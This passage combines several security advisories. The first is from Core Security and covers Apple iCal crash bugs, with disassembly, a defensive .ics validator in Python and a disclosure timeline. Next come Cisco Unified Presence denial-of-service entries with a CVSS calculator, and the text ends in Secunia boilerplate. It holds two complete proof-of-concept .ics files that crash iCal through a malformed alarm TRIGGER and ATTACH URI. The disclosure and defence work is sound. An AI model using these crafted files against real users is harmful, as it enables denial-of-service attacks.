those values until this function is entered, where they appear as its
arguments:
/-----------
BFFFEF7C arg_C dd 0
BFFFEF80 arg_10 dd 0
- -----------/
We see that the function argument 'arg_C' is loaded and moved to 'EDI'.
/-----------
0014ADE0 mov edi, [ebp+arg_C]
- -----------/
This is the location that is written to at the moment of the crash
further ahead; the zero comes from the caller's stack and cannot be
changed by the attacker:
/-----------
0014AE2F mov dword ptr [edi], 0
- -----------/
Closer to the point of the crash, because we control 'EAX' we can
influence which branch is taken after it is compared with '[ebx+0Ch]'
and '[ebx+08h]':
/-----------
0014AE20 cmp eax, [ebx+0Ch] (if it is lower than 1)
0014AE23 jl short loc_14AE2F
0014AE25 cmp eax, [ebx+8] (if it is lower than 0x270F)
0014AE2D jle short loc_14AE37
169280B8 dd 270Fh (ebx+08)
169280BC dd 1 (ebx+0C)
- -----------/
The first comparison ('JL') does not avoid the crash zone, but negative
numbers cannot be entered by default, and a zero value neither crashes
the program nor brings it near the critical zone. Any other value crashes
the application when it writes to the null location.
In the other case the comparison is such that if 'EAX' is less than
'0x270f' the crash zone is avoided and the program continues to work
without problems. Negative values are not read, and if a value greater
than '0x7fffffff' is supplied, the maximum value is used instead.
The corresponding PoC follows. To trigger the bug, import a .ics file
with the following content, then click on the 65535 in edit mode and
accept it without changes.
/-----------
BEGIN:VCALENDAR
X-WR-CALNAME:Fake event
PRODID:-//Apple Inc.//iCal 3.0//EN
CALSCALE:GREGORIAN
VERSION:2.0
METHOD:PUBLISH
BEGIN:VTIMEZONE
TZID:America/Buenos_Aires
BEGIN:DAYLIGHT
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:19991003T000000
RDATE:19991003T000000
TZNAME:ARST
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:20000303T000000
RDATE:20000303T000000
RDATE:20001231T210000
TZNAME:ART
END:STANDARD
END:VTIMEZONE
BEGIN:VEVENT
SEQUENCE:10
DTSTART;TZID=America/Buenos_Aires:20071225T000000
DTSTAMP:20071213T124414Z
SUMMARY:Fake Event
DTEND;TZID=America/Buenos_Aires:20071225T010000
RRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1
UID:651D31BE-455E-45ED-99C6-55B9F03A3FA9
TRANSP:OPAQUE
CREATED:20071213T124215Z
BEGIN:VALARM
X-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49
ACTION:DISPLAY
DESCRIPTION:Event reminder
TRIGGER:-PT65535H
END:VALARM
END:VEVENT
END:VCALENDAR
- -----------/
3) Improper resource liberation (Bugtraq ID 28633, CVE-2008-2007)
This is another case of insufficient validation of a file in the
iCalendar format, and it results in a more serious bug.
A vulnerable .ics file will contain the following line:
/-----------
ATTACH;VALUE=URI:S=osumi
- -----------/
The corresponding PoC follows. Double-click on a .ics file with the
following content and an event will be created. To crash iCal, click on
the newly created event and then on the alarm sound list.
/-----------
BEGIN:VCALENDAR
X-WR-TIMEZONE:America/Buenos_Aires
PRODID:-//Apple Inc.//iCal 3.0//EN
CALSCALE:GREGORIAN
X-WR-CALNAME:evento falso
VERSION:2.0
X-WR-RELCALID:71CE8EAD-380B-4EA3-A123-60F9B2A03990
METHOD:PUBLISH
BEGIN:VTIMEZONE
TZID:America/Buenos_Aires
BEGIN:DAYLIGHT
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:19991003T000000
RDATE:19991003T000000
TZNAME:ARST
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:20000303T000000
RDATE:20000303T000000
RDATE:20001231T210000
TZNAME:ART
END:STANDARD
END:VTIMEZONE
BEGIN:VEVENT
SEQUENCE:11
DTSTART;TZID=America/Buenos_Aires:20071225T000000
DTSTAMP:20071213T143420Z
SUMMARY:evento falso
DTEND;TZID=America/Buenos_Aires:20071225T010000
LOCATION:donde se hace
RRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1
TRANSP:OPAQUE
UID:651D31BE-455E-45ED-99C6-55B9F03A3FA9
URL;VALUE=URI:http://pepe.com:443/pepe
ATTACH;FMTTYPE=text/php;X-APPLE-CACHED=1:ical://attachments/4E3646DE-ED2
 0-449C-88E7-744E62BC8C12/651D31BE-455E-45ED-99C6-55B9F03A3FA9/popote.php
CREATED:20071213T142720Z
CREATED:20071213T124215Z
BEGIN:VALARM
X-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49
ACTION:DISPLAY
DESCRIPTION:Event reminder
TRIGGER:-PT15H
END:VALARM
BEGIN:VALARM
X-WR-ALARMUID:F54A0E05-57B8-4562-8E77-056B19305CD0
ACTION:AUDIO
TRIGGER:-PT15M
ATTACH;VALUE=URI:S=osumi
END:VALARM
END:VEVENT
END:VCALENDAR
- -----------/
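The three PoC files above all succeed because iCal trusts numeric and URI values straight out of the file. As an added example (not code from the Core advisory or from Apple), the following Python pre-filter shows the kind of validation a CalDAV server or mail gateway could apply before a calendar reaches the client: it unfolds RFC 2445 content lines, walks the BEGIN/END components and rejects the three shapes used above (an RRULE COUNT far beyond any plausible recurrence, a VALARM TRIGGER duration whose fields overflow sane bounds, and an ATTACH;VALUE=URI whose value is not a URI). MAX_COUNT, MAX_DURATION_PART and the trimmed sample files are this example's own constructions, not limits taken from iCal or the RFC.

```python
"""Defensive pre-filter for iCalendar (.ics) files. Added example, not code
from the Core advisory or Apple; MAX_COUNT and MAX_DURATION_PART are this
example's own assumptions, not limits taken from iCal or RFC 2445."""
import re

MAX_COUNT = 10_000          # assumption: no legitimate RRULE needs more repeats
MAX_DURATION_PART = 9_999   # assumption: cap on each W/D/H/M/S duration field
URI_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*:\S+$")            # scheme:rest
DURATION_RE = re.compile(                                        # RFC 2445 dur-value
    r"^[+-]?P(?:(\d+)W)?(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")


def unfold(text: str) -> list[str]:
    """Join RFC 2445 folded lines: a continuation line starts with SPACE/HTAB."""
    lines: list[str] = []
    for raw in text.splitlines():
        if raw[:1] in (" ", "\t") and lines:
            lines[-1] += raw[1:]
        elif raw:
            lines.append(raw)
    return lines


def parse_line(line: str) -> tuple[str, dict[str, str], str]:
    """Split 'NAME;PARAM=VAL;...:value' into (NAME, {PARAM: VAL}, value)."""
    head, _, value = line.partition(":")
    name, *raw_params = head.split(";")
    params = {k.upper(): v for k, _, v in (p.partition("=") for p in raw_params)}
    return name.upper(), params, value


def check_ics(text: str) -> list[str]:
    """Return findings for one .ics document; an empty list means it passed."""
    findings: list[str] = []
    stack: list[str] = []                           # open BEGIN:... components
    for line in unfold(text):
        name, params, value = parse_line(line)
        if name == "BEGIN":
            stack.append(value.upper())
            continue
        if name == "END":
            if stack:
                stack.pop()
            continue
        component = stack[-1] if stack else ""
        if name == "RRULE":                          # PoC 1: COUNT=2147483646
            for part in value.split(";"):
                k, _, v = part.partition("=")
                if k.upper() == "COUNT" and (not v.isdigit() or int(v) > MAX_COUNT):
                    findings.append(f"RRULE COUNT out of range: {v}")
        elif name == "TRIGGER" and component == "VALARM":   # PoC 2: -PT65535H
            if params.get("VALUE", "DURATION").upper() == "DURATION":
                m = DURATION_RE.match(value)
                if not m:
                    findings.append(f"TRIGGER is not a valid duration: {value}")
                elif any(int(g) > MAX_DURATION_PART for g in m.groups() if g):
                    findings.append(f"TRIGGER duration field out of range: {value}")
        elif name == "ATTACH" and params.get("VALUE", "URI").upper() == "URI":
            if not URI_RE.match(value):             # PoC 3: ATTACH;VALUE=URI:S=osumi
                findings.append(f"ATTACH is not a URI: {value}")
    return findings


# Constructed, trimmed-down versions of the three PoC files above: only the
# properties the checks look at are kept (the ATTACH line is folded on purpose).
SAMPLE_COUNT = """BEGIN:VCALENDAR
BEGIN:VEVENT
RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646
END:VEVENT
END:VCALENDAR
"""
SAMPLE_TRIGGER = """BEGIN:VCALENDAR
BEGIN:VEVENT
BEGIN:VALARM
ACTION:DISPLAY
TRIGGER:-PT65535H
END:VALARM
END:VEVENT
END:VCALENDAR
"""
SAMPLE_ATTACH = """BEGIN:VCALENDAR
BEGIN:VEVENT
ATTACH;FMTTYPE=text/php;X-APPLE-CACHED=1:ical://attachments/4E3646DE-ED2
 0-449C-88E7-744E62BC8C12/popote.php
BEGIN:VALARM
ACTION:AUDIO
ATTACH;VALUE=URI:S=osumi
END:VALARM
END:VEVENT
END:VCALENDAR
"""
SAMPLE_BENIGN = SAMPLE_COUNT.replace("COUNT=2147483646", "COUNT=10")


def scan_samples() -> dict[str, list[str]]:
    """Run the pre-filter over the constructed samples."""
    return {n: check_ics(s) for n, s in (("count", SAMPLE_COUNT), ("trigger", SAMPLE_TRIGGER),
                                         ("attach", SAMPLE_ATTACH), ("benign", SAMPLE_BENIGN))}
```

The filter deliberately checks the folded form of the ATTACH line in the third PoC (a legitimate ical:// URI) and passes it, while the alarm's `S=osumi` value is rejected because it has no scheme. The bounds are policy, not protocol: the advisory's own analysis shows the dangerous values are those large enough to fail iCal's internal range check, so any cap well below 0x270F for duration fields and well below 0x7FFFFFFF for COUNT keeps these files away from the crashing path.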
*Report Timeline*
. 2008-01-30: Core sends an initial notification that vulnerabilities were
discovered in the iCal application and iCal server and that an advisory
draft is available.
. 2008-01-31: Vendor acknowledges and requests the draft.
. 2008-01-31: Core sends the draft, including proof-of-concept files that
trigger the bugs.
. 2008-02-12: Core requests update info on the vulnerabilities and states
that it wants to coordinate the date of the disclosure.
. 2008-02-18: Core requests update info on the vulnerabilities.
. 2008-02-18: Vendor replies that the iCal Server (CVE-2008-1000)
vulnerability is tracked for a fix in an upcoming update and that the
vulnerabilities in the iCal client application will be fixed in an update
following the early March software update.
. 2008-02-19: Core indicates that it will split the report into two
security advisories. CORE-2008-0123 will address the vulnerability in iCal
server (CVE-2008-1000) and will be published in coordination with the
release of the vendor's March software update. The publication date of the
second advisory, dealing with the three vulnerabilities in the iCal client
application, will be coordinated for a date after the March update unless
there are clear indications of the vulnerabilities being exploited in the
wild, in which case, if Core considers that the information provided in
the advisory would help end users decide how to react, the advisory would
be published sooner as a "forced release".
. 2008-03-03: Core requests update info on the vulnerability, a concrete
release schedule and text for the advisory section called "Vendor
Information, Solutions and Workarounds".
. 2008-03-04: Vendor provides information concerning CVE-2008-1000 and
indicates that the bug is in the Wiki server and not the iCal Server.
. 2008-03-13: Core re-schedules the publication to March 24th and requests
from the vendor an update on the coordinated date of disclosure. The
remaining three vulnerabilities in the iCal client application will be
dealt with by a second security advisory (CORE-2008-0126) to be published
after the release of the March software update. Publication of
CORE-2008-0126 is initially slated for March 24th 2008, but the final date
can be discussed further with the vendor based on its estimated date for
fixes.
. 2008-03-18: APPLE-SA-2008-0318 software update released.
. 2008-03-18: CORE-2008-0123 is published.
. 2008-03-18: Vendor informs that it will track the first two issues as
crasher-only bugs but still intends to address them. Further details to
determine whether the null pointer dereference bugs are exploitable are
requested. The vendor will continue to track the third as a security bug
and estimates early April for the release of the software update that
fixes them. Additional timing information will be provided closer to the
estimated date.
. 2008-03-18: Core re-schedules the publication to April 7th and indicates
that should any new details about the vulnerabilities become available
they will be forwarded to the vendor.
. 2008-04-04: Core requests a more precise release date for the fixes in
order to coordinate the publication, and recommends that the vendor
consider all three as security bugs because it could not be proved that
in this case the integer overflows cannot be exploited.
. 2008-04-07: Vendor requests that Core postpone the advisory publication
until the fix is available.
. 2008-04-07: Core requests a more precise release date for the fixes to
coordinate the new publication date.
. 2008-04-07: Vendor informs that the estimated date for the update is
near the end of April.
. 2008-04-08: Core confirms that coordinating the publication of
CORE-2008-0126 for April 28th is acceptable.
. 2008-04-16: Core requests an update on the release date of the fixes.
. 2008-04-17: Vendor states that end of April is still the estimated date
and provides more details explaining why the first two bugs are
considered null-pointer dereference bugs only: a value range check is
performed, and out-of-range values branch execution to instructions that
assign NULL to a pointer, which later triggers a null pointer dereference
that crashes the application. The root cause of the crash is therefore a
NULL pointer dereference and not an integer overflow.
. 2008-04-17: Core confirms that the first two bugs can be considered
crashes due to null-pointer dereference. Upon further research it is
confirmed that the integer overflows are detected and do not cause the
actual crashes.
. 2008-04-17: Vendor asks for confirmation that the first two bugs have no
security-related consequences.
. 2008-04-17: Core responds that all three bugs still have
security-related consequences. The first two can be abused for denial of
service attacks by untrusted and unauthenticated third parties,
specifically using a public server as the attack vector. Core considers
bugs that can be triggered by unauthenticated third parties to be
security vulnerabilities. Core indicates that exploitation of null pointer
dereference bugs cannot be ruled out generically, a statement which could
be derived from Rice's theorem.
. 2008-04-25: Core requests an update on the release date of the fixes
and sends detailed information on the analysis of the first bug.
. 2008-04-27: Vendor estimates early May as the release date of the
software fixes.
. 2008-05-05: Core informs the vendor that it is re-scheduling the
publication to May 12th as a final date unless precise information is
given on the release date of the fixes.
. 2008-05-06: Vendor responds, specifying that the fixes are being
released sometime the following week.
. 2008-05-07: Core states that it is not willing to re-schedule the
publication date unless the vendor commits to a concrete date.
. 2008-05-10: Vendor asks Core not to publish the advisory before the
Apple security update is available. Vendor indicates that fixes will be
released on May 19th, 2008.
. 2008-05-10: Given that the vendor has communicated a concrete date, Core
will discuss re-scheduling (for the fifth time) the publication date of
the advisory.
. 2008-05-12: Core communicates to the vendor that the publication of the
advisory is re-scheduled to May 21st; that date is final.
. 2008-05-14: Vendor acknowledges reception of the last email and
appreciates that Core postponed the advisory publication date.
. 2008-05-20: Core sends the final draft of the advisory to the vendor.
. 2008-05-21: An edited and corrected final version of the advisory is
sent to the vendor.
. 2008-05-21: Advisory CORE-2008-0126 is published.
*References*
[1]
RFC 2445: Internet Calendaring and Scheduling Core Object
Specification (iCalendar) - http://tools.ietf.org/html/rfc2445
[2] RFC 4791: Calendaring Extensions to WebDAV -
http://tools.ietf.org/html/rfc4791
[3] http://www.apple.com/downloads/macosx/calendars/
[4] iCalShare http://icalshare.com/
[5] iCalWorld http://www.icalworld.com/
*About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs/.
*About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.
*Disclaimer*
The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.
*GPG/PGP Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFINH0iyNibggitWa0RAtdmAKCf4V+tks7RBYRRa2Bp9IT3LjBoQgCfeff8
PZO21gkXaFO1pAdxuViw2ys=
=xZCy
-----END PGP SIGNATURE-----
VAR-200805-0197 | CVE-2008-1158 | Cisco Unified Presence Engine Service In IP Service disruption due to packets (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The Presence Engine (PE) service in Cisco Unified Presence before 6.0(1) allows remote attackers to cause a denial of service (core dump and service interruption) via malformed packets, aka Bug ID CSCsh50164. A remote attacker can put the service into a denial of service (DoS) state by sending deliberately crafted packets. Cisco tracks the problem as Bug ID CSCsh50164. Please refer to the “Overview” for the impact of this vulnerability.
An attacker can exploit this issue to crash the affected device, denying service to legitimate users. The Cisco Bug ID for this issue is CSCsh50164. ----------------------------------------------------------------------
The vulnerabilities affect version 1.0.
SOLUTION:
Upgrade to version 6.0(3).
http://www.cisco.com/pcgi-bin/tablebuild.pl/cup-60?psrtdcat20e2
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cup.shtml
----------------------------------------------------------------------
VAR-200805-0204 | CVE-2008-1740 | Cisco Unified Presence Engine Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The Presence Engine (PE) service in Cisco Unified Presence before 6.0(1) allows remote attackers to cause a denial of service (core dump and service interruption) via an unspecified "stress test," aka Bug ID CSCsh20972. A remote attacker can put the service into a denial of service (DoS) state through an unspecified 'stress test'; further details are not known. Cisco tracks the problem as Bug ID CSCsh20972. Please refer to the “Overview” for the impact of this vulnerability.
An attacker can exploit this issue to cause the affected application to crash, denying service to legitimate users.
These vulnerabilities were discovered internally by Cisco, and there
are no workarounds.
Cisco has released free software updates that address these
vulnerabilities.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cup.shtml. The software version
can be determined by running the command show version active via the
Command Line Interface (CLI).
Products Confirmed Not Vulnerable
+--------------------------------
No other Cisco products are currently known to be affected by these
vulnerabilities.
Details
=======
Cisco Unified Presence collects information about a user's
availability status and communications capabilities. Using
information captured by Cisco Unified Presence, applications such as
Cisco Unified Personal Communicator and Cisco Unified Communications
Manager can improve productivity by helping users connect with
colleagues more efficiently by determining the most effective means
for collaborative communication. There are no workarounds for these
vulnerabilities.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCsh50164 - PE Service core dumps when it receives malformed packets
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsh20972 - PE Service core dumps under stress test
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsj64533 - SIPD service core dumps during TCP port scan
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
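The scores listed for the three bugs follow directly from the CVSS v2 equations. As an added example (not Cisco's calculator and not part of this advisory), the following Python module reproduces the 7.8 base and 6.4 temporal scores from the listed metrics and adds the environmental computation the advisory leaves to the customer. The metric weights are the published CVSS v2 constants; CUP_VECTOR is this example's own encoding of the metrics Cisco lists (Network / Low / None / None / None / Complete, Functional / Official-Fix / Confirmed), and the environmental metrics appended in the usage below are assumed values for an illustrative site.

```python
"""CVSS v2 base, temporal and environmental scoring.

Added example, not part of the Cisco advisory: it implements the CVSS v2
equations so the 7.8 / 6.4 scores above can be reproduced from their metrics
and extended with a site-specific environmental score, which Cisco leaves to
the customer. Weights are the published CVSS v2 constants."""
from decimal import Decimal, ROUND_HALF_UP
from typing import Optional

BASE = {
    "AV": {"L": 0.395, "A": 0.646, "N": 1.0},
    "AC": {"H": 0.35, "M": 0.61, "L": 0.71},
    "Au": {"M": 0.45, "S": 0.56, "N": 0.704},
    "C": {"N": 0.0, "P": 0.275, "C": 0.660},
    "I": {"N": 0.0, "P": 0.275, "C": 0.660},
    "A": {"N": 0.0, "P": 0.275, "C": 0.660},
}
TEMPORAL = {
    "E": {"U": 0.85, "POC": 0.9, "F": 0.95, "H": 1.0, "ND": 1.0},
    "RL": {"OF": 0.87, "TF": 0.90, "W": 0.95, "U": 1.0, "ND": 1.0},
    "RC": {"UC": 0.90, "UR": 0.95, "C": 1.0, "ND": 1.0},
}
ENV = {
    "CDP": {"N": 0.0, "L": 0.1, "LM": 0.3, "MH": 0.4, "H": 0.5, "ND": 0.0},
    "TD": {"N": 0.0, "L": 0.25, "M": 0.75, "H": 1.0, "ND": 1.0},
    "CR": {"L": 0.5, "M": 1.0, "H": 1.51, "ND": 1.0},
    "IR": {"L": 0.5, "M": 1.0, "H": 1.51, "ND": 1.0},
    "AR": {"L": 0.5, "M": 1.0, "H": 1.51, "ND": 1.0},
}
TABLES = {**BASE, **TEMPORAL, **ENV}

# This example's encoding of the metrics Cisco lists for all three bugs.
CUP_VECTOR = "AV:N/AC:L/Au:N/C:N/I:N/A:C/E:F/RL:OF/RC:C"


def round1(x: float) -> float:
    """CVSS v2 rounds to one decimal, half up (Python's round() is half-even)."""
    return float(Decimal(str(x)).quantize(Decimal("0.1"), rounding=ROUND_HALF_UP))


def parse_vector(vector: str) -> dict[str, str]:
    """Parse 'AV:N/AC:L/...' into {metric: value}, rejecting unknown metrics."""
    metrics: dict[str, str] = {}
    for part in vector.split("/"):
        name, sep, value = part.partition(":")
        if not sep or name not in TABLES or value not in TABLES[name]:
            raise ValueError(f"bad CVSS v2 metric: {part!r}")
        metrics[name] = value
    missing = [m for m in BASE if m not in metrics]
    if missing:
        raise ValueError(f"missing base metrics: {missing}")
    return metrics


def impact_subscore(m: dict[str, str]) -> float:
    c, i, a = (BASE[k][m[k]] for k in ("C", "I", "A"))
    return 10.41 * (1 - (1 - c) * (1 - i) * (1 - a))


def adjusted_impact(m: dict[str, str]) -> float:
    """Impact re-weighted by the CR/IR/AR requirements and capped at 10."""
    c, i, a = (BASE[k][m[k]] for k in ("C", "I", "A"))
    cr, ir, ar = (ENV[k][m.get(k, "ND")] for k in ("CR", "IR", "AR"))
    return min(10.0, 10.41 * (1 - (1 - c * cr) * (1 - i * ir) * (1 - a * ar)))


def exploitability_subscore(m: dict[str, str]) -> float:
    return 20 * BASE["AV"][m["AV"]] * BASE["AC"][m["AC"]] * BASE["Au"][m["Au"]]


def base_score(m: dict[str, str], impact: Optional[float] = None) -> float:
    impact = impact_subscore(m) if impact is None else impact
    f_impact = 0.0 if impact == 0 else 1.176
    return round1((0.6 * impact + 0.4 * exploitability_subscore(m) - 1.5) * f_impact)


def temporal_score(m: dict[str, str], base: Optional[float] = None) -> float:
    base = base_score(m) if base is None else base
    factor = 1.0
    for name in TEMPORAL:
        factor *= TEMPORAL[name][m.get(name, "ND")]
    return round1(base * factor)


def environmental_score(m: dict[str, str]) -> float:
    """Temporal score recomputed on the adjusted impact, then scaled by CDP/TD."""
    adjusted_temporal = temporal_score(m, base_score(m, adjusted_impact(m)))
    cdp, td = ENV["CDP"][m.get("CDP", "ND")], ENV["TD"][m.get("TD", "ND")]
    return round1((adjusted_temporal + (10 - adjusted_temporal) * cdp) * td)


def score(vector: str) -> dict[str, float]:
    """Base, temporal and environmental scores for one CVSS v2 vector string."""
    m = parse_vector(vector)
    return {"base": base_score(m), "temporal": temporal_score(m),
            "environmental": environmental_score(m)}
```

Calling `score(CUP_VECTOR)` returns base 7.8 and temporal 6.4, matching the advisory; appending site-specific metrics such as `/CDP:LM/TD:H` (assumed values: low-medium collateral damage, all presence servers exposed) raises the environmental score to 7.5, while `/TD:N` drives it to 0 for a site with no Cisco Unified Presence deployment. The runtime factors only ever lower the score from its base, so the 7.8 remains the figure to compare against other advisories.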
Impact
======
Successful exploitation of any of the vulnerabilities may result in
the interruption of presence services.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Fixes for all the vulnerabilities listed in this advisory are
included in Cisco Unified Presence version 6.0(3) that is available
at the following link:
http://www.cisco.com/pcgi-bin/tablebuild.pl/cup-60?psrtdcat20e2
Workarounds
===========
There are no workarounds for these vulnerabilities.
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
These vulnerabilities were internally discovered by Cisco.
Status of this Notice: FINAL
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cup.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-teams@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision |             | Initial       |
| 1.0      | 2008-May-14 | public        |
|          |             | release       |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at http://www.cisco.com/go/psirt.
-----BEGIN PGP SIGNATURE-----
iD8DBQFIKw1+86n/Gc8U/uARAlunAJ9UTjai8ZofKwUcH7B3CqyBetjIDwCdHgUI
91czchLkcIoB9pmUP9zWEI0=
=gkID
-----END PGP SIGNATURE-----
----------------------------------------------------------------------
Secunia Network Software Inspector 2.0 (NSI) - Public Beta
The Public Beta has ended. Thanks to all that participated.
SOLUTION:
Upgrade to version 6.0(3).
http://www.cisco.com/pcgi-bin/tablebuild.pl/cup-60?psrtdcat20e2
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cup.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
